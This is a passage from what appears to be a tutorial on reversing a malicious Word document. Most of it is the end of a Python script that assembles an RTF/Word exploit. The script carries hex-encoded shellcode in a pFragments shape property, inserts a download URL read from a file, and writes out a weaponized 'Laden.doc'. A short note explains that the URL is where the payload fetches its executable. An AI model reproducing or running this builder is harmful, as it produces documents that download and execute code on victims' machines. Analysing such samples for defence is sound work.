"\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" "\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" "\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" ) url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document